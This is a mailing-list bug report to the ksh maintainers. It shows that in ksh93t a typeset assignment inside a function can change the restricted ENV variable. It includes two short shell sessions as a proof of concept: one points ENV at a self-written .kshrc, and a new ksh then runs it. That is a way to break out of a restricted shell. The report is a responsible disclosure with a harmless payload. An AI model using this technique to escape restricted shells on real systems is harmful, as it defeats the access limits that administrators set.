It's been a while since my initial report on ksh restricted mode bugs in
https://mailman.research.att.com/pipermail/ast-users/2007q1/001609.html . But, I
finally have the opportunity for a follow-up.

Most of the bugs I reported were neatly fixed. However, one has remained all the
way through to the current Version M 93t 2008-11-04. It's still possible to
change the value of ENV through a typeset assignment in a function while in
restricted mode. The following examples I gave in my initial report still
violate restrictions when run in restricted mode:

# Attempt to assign a new value to ENV via typeset in a function in
# restricted mode.
$ function demoENV
> { print Before typeset ENV = $ENV
> typeset ENV=.kshrc
> print $?
> print After typeset ENV = $ENV
> print 'And from set: \c'; set | grep ^ENV=
> }
$ demoENV
Before typeset ENV = /Users/terrence/.kshrc
0
After typeset ENV = .kshrc
And from set: ENV=.kshrc

# Now, let's see if we can get the modified ENV to do something nasty
# (but not too nasty -- it's only a demo).
$ function moreENV
> { print Before typeset ENV = $ENV
> typeset -x ENV=.kshrc
> print $?
> print After typeset ENV = $ENV
> print 'And from env: \c'; env | grep ^ENV=
> print print in .kshrc | tee .kshrc | read
> print exit | ksh -E
> }
$ moreENV
Before typeset ENV = /Users/terrence/.kshrc
0
After typeset ENV = .kshrc
And from env: ENV=.kshrc
in .kshrc

However contrived the second example might be, the point is that any
restrictions on ENV can be circumvented with a typeset in a function. It's kind
of strange that ENV is the only restricted variable that breaks restrictions
like this.

Terrence Doyle

PS:
From now on I will post my bug reports to ast-developers as directed under AT&T
Research AST and UWIN mailing groups at
http://www.research.att.com/sw/download/ .